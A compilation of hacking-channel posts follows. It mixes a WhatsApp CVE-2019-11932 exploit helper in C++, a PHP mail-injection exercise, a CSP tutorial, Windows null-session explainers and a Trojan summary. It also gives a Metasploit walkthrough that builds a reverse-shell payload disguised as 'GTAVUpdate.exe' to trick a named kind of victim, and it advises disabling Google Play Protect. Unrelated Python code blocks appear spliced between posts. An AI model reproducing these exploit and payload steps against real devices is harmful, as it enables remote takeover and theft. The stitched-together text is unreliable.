UNDERCODE COMMUNITY (@UndercodeCommunity)

🦑 The real latest WhatsApp CVE:


Finally uploaded

# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Valerio Brussani (@val_brux)
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)

/*
 *
 * Introduction
 * This native code file aims to be complementary to the published WhatsApp GIF RCE exploit by Awakened, by calculating the system() function address and the ROP gadget address for different types of devices, which can then be used to successfully exploit the vulnerability.
 * The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp
 *
 */

#include <jni.h>
#include <string>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <cstdint>
#include <dlfcn.h>
#include <link.h>

typedef uint8_t byte;
char *gadget_p;          // load address of the first PT_LOAD segment of libhwui.so
void *libc, *lib;

// dl_iterate_phdr callback: record the load base of /system/lib64/libhwui.so
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
    const char *base = (const char *)info->dlpi_addr;
    for (int j = 0; j < info->dlpi_phnum; j++) {
        const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
        if (phdr->p_type == PT_LOAD && info->dlpi_name != NULL &&
            strcmp("/system/lib64/libhwui.so", info->dlpi_name) == 0) {
            gadget_p = (char *)base + phdr->p_vaddr;
            return 1;  // a non-zero return stops the iteration
        }
    }
    return 0;
}

// system() address, resolved through the dynamic linker
void *get_system_address() {
    libc = dlopen("libc.so", RTLD_GLOBAL);
    return dlsym(libc, "system");
}

// load libhwui.so and let dl_callback record its base address
void get_gadget_lib_base_address() {
    lib = dlopen("libhwui.so", RTLD_GLOBAL);
    dl_iterate_phdr(dl_callback, NULL);
}

// file offset of the gadget byte pattern inside libhwui.so on disk
long search_for_gadget_offset() {
    FILE *fd = fopen("/system/lib64/libhwui.so", "rb");
    if (fd == NULL)
        return -1;
    fseek(fd, 0, SEEK_END);
    long filelen = ftell(fd);
    rewind(fd);
    char *buffer = (char *)malloc((filelen + 1) * sizeof(char));
    fread(buffer, filelen, 1, fd);
    fclose(fd);
    // byte pattern of the gadget (three AArch64 instructions)
    byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
    long pos = 0;
    int curSearch = 0;
    while (pos < filelen) {
        char curChar = buffer[pos];
        pos++;
        if ((byte)curChar == g1[curSearch]) {
            curSearch++;
            if (curSearch > 11) {  // all 12 bytes matched: rewind to the pattern start
                pos -= 12;
                break;
            }
        } else {
            curSearch = 0;
        }
    }
    free(buffer);
    return pos;
}

extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv *env, jobject) {
    char buff[30];
    // system address
    snprintf(buff, sizeof(buff), "%p", get_system_address());
    dlclose(libc);
    std::string system_string = buff;
    return env->NewStringUTF(system_string.c_str());
}

extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv *env, jobject) {
    char buff[30];
    get_gadget_lib_base_address();
    // gadget address = library base + file offset of the pattern
    snprintf(buff, sizeof(buff), "%p", gadget_p + search_for_gadget_offset());
    dlclose(lib);
    std::string gadget_string = buff;
    return env->NewStringUTF(gadget_string.c_str());
}


🦑 New tip:
The Content-Security-Policy (CSP) meta tag
1. How can I allow multiple sources?
You can simply list your sources after a directive as a space-separated list:
content="default-src 'self' https://example.com/js/"
Note that there are no quotes around parameters other than the special ones, like 'self'. Also, there's no colon (:) after the directive. Just the directive, then a space-separated list of parameters.
Everything under the specified path is implicitly allowed. That means that in the example above these would be valid sources:
https://example.com/js/file.js
https://example.com/js/subdir/anotherfile.js
These, however, would not be valid:
http://example.com/js/file.js
^^^^ wrong protocol

https://example.com/file.js
^^ above the specified path
2. How can I use different directives? What do they each do?
The most common directives are:
• default-src: the default policy for loading JavaScript, images, CSS, fonts, AJAX requests, etc.
• script-src: defines valid sources for JavaScript files
• style-src: defines valid sources for CSS files
• img-src: defines valid sources for images
• connect-src: defines valid targets for XMLHttpRequest (AJAX), WebSockets or EventSource. If a connection attempt is made to a host that's not allowed here, the browser will emulate a 400 error
There are others, but these are the ones you're most likely to need.
3. How can I use multiple directives?
You define all your directives inside one meta-tag by terminating them with a semicolon (;):
content="default-src 'self' https://example.com/js/; style-src 'self'"
4. How can I handle ports?
Everything but the default ports needs to be allowed explicitly by adding the port number or an asterisk after the allowed domain:
content="default-src 'self' https://ajax.googleapis.com http://example.com:123/free/stuff/"
The above would result in:
https://ajax.googleapis.com:123
^^^^ Not ok, wrong port

https://ajax.googleapis.com - OK

http://example.com/free/stuff/file.js
^^ Not ok, only the port 123 is allowed

http://example.com:123/free/stuff/file.js - OK
As I mentioned, you can also use an asterisk to explicitly allow all ports:
content="default-src example.com:*"
5. How can I handle different protocols?
By default, only standard protocols are allowed. For example, to allow WebSockets (ws://) you have to allow them explicitly:
content="default-src 'self'; connect-src ws:; style-src 'self'"
^^^ WebSockets are now allowed on all domains and ports.
6. How can I allow the file protocol file://?
If you try to define it as file://, it won't work. Instead, you allow it with the filesystem parameter:
content="default-src filesystem"
7. How can I use inline scripts and style definitions?
Unless explicitly allowed, you can't use inline style definitions, code inside <script> tags, or code in tag attributes like onclick. You allow them like so:
content="script-src 'unsafe-inline'; style-src 'unsafe-inline'"
You'll also have to explicitly allow inline, base64 encoded images:
content="img-src data:"
8. How can I allow eval()?
I'm sure many people would say that you don't, since 'eval is evil' and the most likely cause for the impending end of the world. Those people would be wrong. Sure, you can definitely punch major holes into your site's security with eval, but it has perfectly valid use cases. You just have to be smart about using it. You allow it like so:
content="script-src 'unsafe-eval'"
9. What exactly does 'self' mean?
You might take 'self' to mean localhost, local filesystem, or anything on the same host. It doesn't mean any of those. It means sources that have the same scheme (protocol), same host, and same port as the file the content policy is defined in. Serving your site over HTTP? No https for you then, unless you define it explicitly.
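To make the rules above concrete (path prefixes, protocol, ports, 'self', and the default-src fallback), here is an added Python model of CSP source matching; it is not part of the original tip, and the names is_allowed/source_matches and the page URL https://mysite.example/ are assumptions. It generalizes beyond the tip's examples to the full [scheme://]host[:port][/path] source form, but is a teaching model, not a browser's complete CSP algorithm.

```python
"""Model of the CSP source-matching rules walked through above.

Added example, not from the original tip: it implements the host, scheme,
'self', port and path rules described there and falls back to default-src
when a directive is absent.  It is a teaching model, not a browser's full
CSP Level 3 algorithm (no https upgrade of http sources, no wildcard hosts).
"""
import re
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443, "ws": 80, "wss": 443}
# host-source: [scheme://]host[:port|:*][/path]
HOST_SOURCE = re.compile(r"(?:([a-z]+)://)?([^/:]+)(?::(\*|\d+))?(/.*)?")


def parse_csp(policy):
    """Split "default-src a b; style-src c" into {directive: [sources]}."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def effective_port(u):
    """Explicit port if present, else the default port of the scheme."""
    return u.port if u.port is not None else DEFAULT_PORTS.get(u.scheme)


def source_matches(src, url, page):
    """True if a single source expression allows url; page is the document URL."""
    u, p = urlsplit(url), urlsplit(page)
    if src == "'self'":  # same scheme, host and port as the document itself
        return (u.scheme, u.hostname, effective_port(u)) == \
               (p.scheme, p.hostname, effective_port(p))
    if src.startswith("'"):  # other keywords ('unsafe-inline', ...) are not hosts
        return False
    if src.endswith(":"):  # scheme-source such as ws: or data:
        return u.scheme == src[:-1].lower()
    m = HOST_SOURCE.fullmatch(src.lower())
    if not m:
        return False
    scheme, host, port, path = m.groups()
    if u.scheme != (scheme or p.scheme) or u.hostname != host:
        return False  # no scheme in the source: only the page's own scheme
    if port == "*":
        pass  # any port allowed
    elif port is not None:
        if u.port != int(port):
            return False  # explicit port must match exactly
    elif effective_port(u) != DEFAULT_PORTS.get(u.scheme):
        return False  # without a port only the scheme's default port is allowed
    if path:
        return u.path.startswith(path) if path.endswith("/") else u.path == path
    return True


def is_allowed(policy, directive, url, page="https://mysite.example/"):
    """Check url against directive, falling back to default-src when unset."""
    directives = parse_csp(policy)
    sources = directives.get(directive, directives.get("default-src", []))
    return any(source_matches(s, url, page) for s in sources)
```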

Unixforum

🦑 PHP mail injection practical exercise by Undercode:

1) Introduction

Today the use of the Internet has risen sharply, but the vast majority of Internet users have no security background. Most people use the Internet to communicate with others via email. For this reason, most websites let their users contact them, make suggestions, report a problem or request feedback, and the user's message is sent to the website administrator's email.

Unfortunately, most web developers do not have enough knowledge of code security. Some of them use existing libraries or frameworks that are subject to many known vulnerabilities. These vulnerabilities have been announced, the vendors have patched them, and the corresponding proof-of-concept attack code is downloadable on the Internet, but many developers are too lazy to upgrade to the latest version.

Today we are going to talk about email injection, through which an attacker can use your mail server to send spam.

2) Email injection

Email injection is a security loophole that is widely present in Internet applications that receive and send email. It is closely related to HTTP header injection. Like SQL injection, it belongs to the class of vulnerabilities that occur when one language is embedded in another, such as MySQL embedded in PHP.

When a form that submits data to a web application is added to a web page, a malicious user may use the MIME format to add extra information to the message to be sent (via POST or GET), such as a new recipient list or a completely different message body. The MIME format uses line breaks to separate the fields in the message (there is a newline between each line of an HTTP request, and a blank line between the HTTP headers and the POST body), so by submitting form data with an added line break (which can easily be done with some FB plug-ins) a simple message board can be turned into a tool for sending thousands of messages. In the same way, a spammer can use this tactic to send a large number of anonymous messages.

Email injection is a type of attack against the built-in mail function of PHP. It lets a malicious attacker inject arbitrary email header fields (Bcc, Cc, Subject, etc.) and thereby send spam from the victim's mail server. This is why the attack is called email injection, or mail-form spamming. The vulnerability is not limited to PHP: it may affect any application that takes input from the user interface and sends email messages. The root cause of this kind of attack is improper validation of user input, or the absence of any validation and filtering mechanism at all.

3) The attack principle of email injection

As the old Chinese saying goes: only by knowing what it is can you know why it is.

To explain how email injection works, we must first understand how the PHP mail function works. Below is the API description from the PHP Manual:

mail():
http://www.php.net/manual/en/function.mail.php
bool mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )
Notice that it takes three required parameters (destination, subject and message) plus some optional ones, and that the function returns a Boolean value.

https://pastebin.com/gfrEEmGa
NOW SEE THIS CODE :



First part:

<?php
$to = "littlehann@foxmail.com";
if (!isset($_POST["send"])) {
?>
This code checks whether the form has been submitted; the response to a user clicking the submit button differs from a normal visit to the page. If the condition is true (the form has not been submitted), the form is displayed and waits for user input. If it is false, the form has been submitted, so the email is sent.

Second part:
<form method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>">
From: <input type="text" name="sender">
Subject: <input type="text" name="subject">
Message:
<textarea name="message" rows="10" cols="60"></textarea>
<input type="submit" name="send" value="Send">
</form>
The second part is an HTML form that collects the user's input.

MORE: https://pastebin.com/f8YAfm2P

4) Mail injection demonstration

Notice:

In order to use PHP as a mail agent, we need to configure php.ini:

[mail function]
; For Win32 only
; http://php.net/smtp
SMTP = smtp.qq.com
; http://php.net/smtp-port
smtp_port = 25

For the demonstration we will use the vulnerable code above. In addition, we will submit the following values as the parameters for sending the email:

mail("littlehann@foxmail.com", "Call me urgent", "Hi,\nPlease call me ASAP.\nBye", "From: Test@UndercodeTesting.com")
HTTP packet sent ...

🦑 From the attacker's point of view, there are many additional fields that can be injected into the email header; see RFC 822 for details. For example, Cc (carbon copy) or Bcc (blind carbon copy) lets the attacker add more recipients.

Note that before adding a new field we must insert a newline to separate it from the previous one; the newline character has the hexadecimal value 0x0A.
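As an added defensive counterpart to the exercise (not part of Undercode's code), this Python guard shows the check the vulnerable form above lacks: any header field carrying the 0x0A/0x0D bytes that the injection relies on is rejected, and From: must be exactly one address. The field names mirror the page's form; the function names, the HeaderInjection class and the recipient admin@example.com are assumptions, and the checks port one-to-one to PHP.

```python
"""Header-injection guard for a mail() contact form like the one above.

Added example, not part of the Undercode exercise. It checks the $_POST-style
fields (sender, subject, message) before they reach mail(): header values must
not contain the CR (0x0D) or LF (0x0A) bytes that let an attacker start a new
header line such as Bcc:, and From: must be exactly one mailbox.
"""
from email.utils import parseaddr


class HeaderInjection(ValueError):
    """Raised when a form field would smuggle extra header lines into the mail."""


def clean_header_value(field, value):
    """Reject line breaks; a header value that spans lines becomes new headers."""
    if "\r" in value or "\n" in value:
        raise HeaderInjection(f"{field}: line break (0x0D/0x0A) in header value")
    return value.strip()


def clean_sender(value):
    """Accept one mailbox for From:; refuse lists and bare or malformed input."""
    value = clean_header_value("From", value)
    if "," in value or ";" in value:
        raise HeaderInjection("From: more than one address")
    _display, addr = parseaddr(value)
    local, sep, domain = addr.rpartition("@")
    if not sep or not local or "." not in domain or any(c.isspace() for c in addr):
        raise HeaderInjection("From: not a single valid address")
    return addr


def build_mail(to, form):
    """Return the (to, subject, message, additional_headers) tuple a safe
    mail() call would use; the recipient is fixed server side, as on the page."""
    subject = clean_header_value("Subject", form.get("subject", ""))
    sender = clean_sender(form.get("sender", ""))
    # The body sits after the blank line that ends the header block, so
    # newlines inside it are harmless and are kept as typed.
    message = form.get("message", "")
    return to, subject, message, f"From: {sender}"


def validate_form(to, form):
    """(True, mail tuple) for a clean submission, (False, reason) otherwise."""
    try:
        return True, build_mail(to, form)
    except HeaderInjection as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Constructed sample submissions: a normal one and a header-injection attempt.
    good = {"sender": "Test@UndercodeTesting.com", "subject": "Call me urgent",
            "message": "Hi,\nPlease call me ASAP.\nBye"}
    bad = {"sender": "Test@UndercodeTesting.com\nBcc: spam-target@example.net",
           "subject": "Call me urgent", "message": "Hi"}
    for form in (good, bad):
        print(validate_form("admin@example.com", form))
```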

You're not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
List of Windows 8.1 Product/Serial Keys 2019
Windows 10 Product Keys (tested on 2019 Version)

🦑 APK install error fix:

Common causes of the "App Not Installed" error:
1) Corrupted files
2) Not enough storage
3) Insufficient system permissions
4) Unsigned app
5) Incompatible version

Solving the "App Not Installed" error:
1) Changing the app code
2) Resetting the app preferences
3) Disabling Google Play Protect
4) Avoiding installation from the SD card
5) Clearing data
6) Signing the app
7) Allowing installation from unknown sources


🦑 Analytics:
A Trojan has been detected that can change proxy settings and intercept HTTPS traffic.

How it works:

1) Microsoft experts have warned about the emergence of a new Trojan capable of modifying proxy server settings, "listening" to encrypted traffic, and stealing credentials and other important information.

2) To spread the malware, dubbed Trojan:JS/Certor.A, cybercriminals use traditional methods, in particular spam mailings. The emails carry a Microsoft Word document attachment containing an embedded OLE object that runs a JScript file when opened. The script is disguised as a harmless file so as not to arouse the user's suspicion; in fact it contains several PowerShell scripts and its own certificate, which is later used to monitor and intercept HTTPS traffic.

3) Once on the system, the malware modifies the Internet Explorer proxy settings in the Windows registry and installs a Tor client, a task-scheduler job, a proxy tunneling utility, and a certificate that lets the attackers read encrypted traffic. In addition, the Trojan installs a separate certificate for the Mozilla Firefox browser, since that browser uses its own proxy settings.

4) All traffic is then redirected to a proxy server controlled by the attacker. As a result, the attackers can remotely monitor, redirect and modify traffic and steal the victim's data.


🦑 What is IPC$?

1) IPC$ (Internet Process Connection) is the share that exposes "named pipes": a named pipe opened for inter-process communication.

2) By providing a trusted user name and password, the two ends of the connection can establish a secure channel and exchange encrypted data over it, which gives access to the remote computer. IPC$ is a feature introduced with NT/2000. One of its characteristics is that only one connection can be established between two IP addresses at the same time.

3) While NT/2000 provides the IPC$ function, it also enables the default shares when the system is first installed: every logical drive (c$, d$, e$ ...) and the system directory winnt or windows (admin$) are shared. Microsoft's original intention was to make administration easier, but intentionally or not, this lowers system security.

4) We constantly hear people talking about "IPC$ loopholes". In fact, IPC$ is not a loophole in the real sense. I think those who say so must be referring to the "backdoor" that Microsoft built in itself: the empty session (null session).



🦑 What is an empty session?

Before introducing the empty session, we need to understand how a secure session is established.

In Windows NT 4.0, a challenge-response protocol is used to establish a session with a remote machine. A successful session becomes a secure tunnel through which the two parties can exchange information. The general sequence is as follows:

1) The session requester (client) sends a packet to the session receiver (server) requesting the establishment of a secure tunnel;

2) The server generates a random 64-digit number (the challenge) and sends it back to the client;

3) The client takes the 64-digit number generated by the server, scrambles it with the password of the account that is trying to establish the session, and returns the result to the server (the response);

4) After the server receives the response, it passes it to the Local Security Authority (LSA). The LSA verifies the response using the user's correct password to confirm the identity of the requester. If the requester's account is a local account of the server, the verification happens locally; if it is a domain account, the response is sent to the domain controller for verification. Once the response to the challenge is verified as correct, an access token is generated and sent to the client. The client uses this access token to connect to resources on the server until the session is terminated.

That is the general process of establishing a secure session, but what about an empty session?

A null session is a session established with the server without trust, that is, without providing a user name and password. According to the Windows 2000 access control model, establishing a null session still requires a token, but because the null session is never authenticated with user information, that token contains no user information. Consequently the session cannot let the system send encrypted information. That does not mean, however, that the null session's token lacks a security identifier (SID): for an empty session, the token provided by the LSA carries the SID S-1-5-7, the SID of the null session, and the user name is ANONYMOUS LOGON.


🦑 Hack Windows 10 with Metasploit:

1) Create the payload
Before creating the payload with msfvenom, we need to find out the local IP of our Kali Linux machine. For that, run
ip addr
or
ifconfig

2) Now let's get our hands dirty!
In the terminal run the following command:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=192.168.195.72 LPORT=4444 -o /root/Desktop/GTAVUpdate.exe

3) The command above instructs msfvenom to generate a 32-bit Windows executable that implements a reverse TCP connection for the payload. The format must be specified as .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, LHOST is the IP address of our attacking Kali Linux machine that we got from the previous command, and LPORT is the port to listen on for a connection from the target once it has been compromised.
The name of the .exe is up to you. In this case I'll be using GTAVUpdate.exe because our target will be a gamer that we know has GTA V.

4) Connection
We now need to set up a listener on the port we chose for the executable. We do this by launching Metasploit with the command msfconsole in the Kali Linux terminal.

5) First, tell Metasploit to use the generic payload handler "multi/handler":
use multi/handler
Then set the payload to match the one built into the executable:
set payload windows/meterpreter/reverse_tcp
Then set the LHOST and LPORT:
set LHOST 192.168.195.72
set LPORT 4444
Once done, type run or exploit and press Enter.

6) On the Windows machine you just need to open IP/File.exe in the browser.
In our case that is 192.168.192.72/GTAVUpdate.exe

source https://medium.com/